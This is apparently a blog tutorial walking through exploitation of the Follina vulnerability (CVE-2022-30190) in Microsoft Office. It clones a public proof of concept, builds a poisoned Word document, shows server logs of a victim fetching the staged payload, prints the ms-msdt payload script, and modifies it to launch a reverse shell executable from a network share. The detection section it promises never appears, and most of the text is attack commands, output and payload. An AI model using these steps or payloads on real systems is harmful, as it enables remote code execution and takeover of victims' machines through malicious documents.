In this tutorial we will go through the very easy to exploit Follina (CVE-2022-30190) which can be used to perform command execution. This is a easy to build exploit as command can be executed on the remote system witout any promot. As this exploit does not require any macro for exploit, and the complexity of the development is easy, attackers can easily use this to enter enterprise network via email and opening the file using Microsoft Office. We will also try to find any detection mechanism so that we can prevent ourselves.

exploit

From the github [1] source we first have to download the content and have to execute it. To download, we can use the following command:

$ git clone https://github.com/ItsNee/Follina-CVE-2022-30190-POC.git
Cloning into 'Follina-CVE-2022-30190-POC'...
remote: Enumerating objects: 57, done.
remote: Counting objects: 100% (57/57), done.
remote: Compressing objects: 100% (43/43), done.
remote: Total 57 (delta 12), reused 38 (delta 7), pack-reused 0
Receiving objects: 100% (57/57), 683.23 KiB | 927.00 KiB/s, done.
Resolving deltas: 100% (12/12), done.

After downloading we can see that there is a python file call follina.py and we will use the below command to generate the malicious file. I could not here the port number seems fixed to 1337 as I have tried other ports but they seem to create some problem.

$ python3 follina.py --payload-url "http://192.168.1.160:1337/pwn.html"
Folina - CVE-2022-30190 Proof of Concept by Nee
Building malicious word document....
Done! Send word doc over to your target and profit
Hosting the payload under the web directory
serving at port 1337

Lets keep this terminal open running. We will see an additional file called poisonedWordFile.doc in the directory.

$ ll
total 20K
drwxr-xr-x 1 x8006 x8006  124 Sep 17 03:58 .
drwxr-xr-x 1 x8006 x8006   52 Sep 16 23:23 ..
-rw-r--r-- 1 x8006 x8006 2.3K Sep 16 23:23 follina.py
drwxr-xr-x 1 x8006 x8006  138 Sep 16 23:23 .git
drwxr-xr-x 1 x8006 x8006   72 Sep 16 23:23 ohno
-rw-r--r-- 1 x8006 x8006  11K Sep 17 03:58 poisonedWordFile.doc
-rw-r--r-- 1 x8006 x8006  485 Sep 16 23:23 README.md
drwxr-xr-x 1 x8006 x8006   56 Sep 16 23:23 source_files
drwxr-xr-x 1 x8006 x8006   16 Sep 16 23:23 web

Let us now transfer the file to victim machine and try to open the file using Microsoft Word. When we try to open the file, we will

192.168.1.104 - - [17/Sep/2022 04:03:58] code 501, message Unsupported method ('OPTIONS')
192.168.1.104 - - [17/Sep/2022 04:03:58] "OPTIONS / HTTP/1.1" 501 -
192.168.1.104 - - [17/Sep/2022 04:03:58] "HEAD /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:03:58] code 501, message Unsupported method ('OPTIONS')
192.168.1.104 - - [17/Sep/2022 04:03:58] "OPTIONS / HTTP/1.1" 501 -
192.168.1.104 - - [17/Sep/2022 04:03:58] "GET /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:03:59] "HEAD /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:03:59] "HEAD /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:03:59] code 501, message Unsupported method ('OPTIONS')
192.168.1.104 - - [17/Sep/2022 04:03:59] "OPTIONS / HTTP/1.1" 501 -
192.168.1.104 - - [17/Sep/2022 04:03:59] "HEAD /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:03:59] code 501, message Unsupported method ('OPTIONS')
192.168.1.104 - - [17/Sep/2022 04:03:59] "OPTIONS / HTTP/1.1" 501 -
192.168.1.104 - - [17/Sep/2022 04:03:59] "GET /pwn.html HTTP/1.1" 304 -
192.168.1.104 - - [17/Sep/2022 04:03:59] "HEAD /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:03:59] "HEAD /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:04:01] "HEAD /pwn.html HTTP/1.1" 200 -

As we can see after running the code a file called pwn.htmlis being called from attacker’s machine and provide rest of the payload.

On the client side we can see the calc.exe poping up ! ea3dc18d7ce52ef50740d624e94418bd.png

reverse shell

We will not change the code is such a way so that we can obtain remote shell just to show how effective this attack can be against Microsoft Office based systems. To understand how we will develop our reverseshell, we will first have to understand what are the content inside the pwn.htmlfile as it seems that it provides the staged payload for this exploit. If we take a look, we will see the following:

$ cat ./web/pwn.html                                                 
<!-- fillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfiller -->

[SNIP]

<!-- fillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfiller -->
<script>
    location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\\\\\\\localhost\\\\c$\\\\windows\\\\system32\\\\calc)/.exe\"";
</script>%    

As we can see that it uses the ms-msdttool to lunch our program. And the malicious content seem to be calc.exe. Now lets modify !!!

remote shell

The below command pops up calc. We need a format so that remote calls are being called. I have now created a python script which acts as a reverse shell and used pyinstaller to make a onefile executable. After the executable was created, I put into a shared folder called pubshare. We will now change the script section as given below in the pwn.htmlfile.

<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\\\\\\\DESKTOP-IG526RS\\\\pubshare\\\\r_shell)/.exe\"";
</script>

When we double click on the malicious document, we get shell ! bfef680db5153c5105a5c292debcfa07.png

disclaimer

The information provided on this website is for educational and informational purposes only. The website owner and contributors do not condone or encourage any illegal activities, including hacking, cyberattacks, or unauthorized access to computer systems or networks.

All information and tools provided on this website are to be used at your own risk. We do not take any responsibility for how you choose to use the information or tools provided here. Users are strongly encouraged to conduct their own research and follow ethical guidelines and legal regulations when using the information and tools presented on this website.

reference

  1. https://github.com/ItsNee/Follina-CVE-2022-30190-POC